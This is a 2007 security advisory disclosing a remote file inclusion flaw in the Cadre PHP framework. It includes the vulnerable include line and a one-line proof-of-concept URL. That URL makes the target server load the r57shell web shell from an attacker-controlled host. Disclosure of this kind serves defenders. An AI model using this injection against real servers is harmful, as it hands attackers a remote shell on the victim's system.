Echo Security Advisory 2007.63

`[ECHO_ADV_63$2007] Cadre remote file inclusion  
-----------------------------------------------  
  
Author : Ahmad Muammar W.K (a.k.a) y3dips  
Date Found : January, 31st 2007  
Location : Indonesia, Jakarta  
web : http://echo.or.id/adv/adv63-y3dips-2007.txt  
Critical Lvl : Critical  
------------------------------------------------  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : Cadre  
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/  
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz  
  
Description : Cadre is a PHP framework for developing large business applications.   
It currently supports PostgreSQL as the database back end (although   
this is extensible). We (Cronosys, LLC) have invested two and a half   
years in this framework and applications based on this framework.  
  
------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~  
  
--------class.Quick_Config_Browser.php --------  
...  
include_once($GLOBALS[config][framework_path] . "class.Browser.php");  
...  
-------------------------------------  
  
  
An attacker can exploit this vulnerability with a simple php injection script.  
  
Poc/Exploit:  
~~~~~~~~~~~~  
  
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/r57shell.php%20?  
  
----------------------------------------------  
Shoutz:  
~~~~~~~  
~ my lovely ana  
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff  
~ str0ke, waraxe, negative  
~ [email protected]  
~ #e-c-h-o @irc.dal.net  
  
------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips|| echo|staff || y3dips[at]gmail[dot]com  
Homepage: http://y3dips.echo.or.id/  
`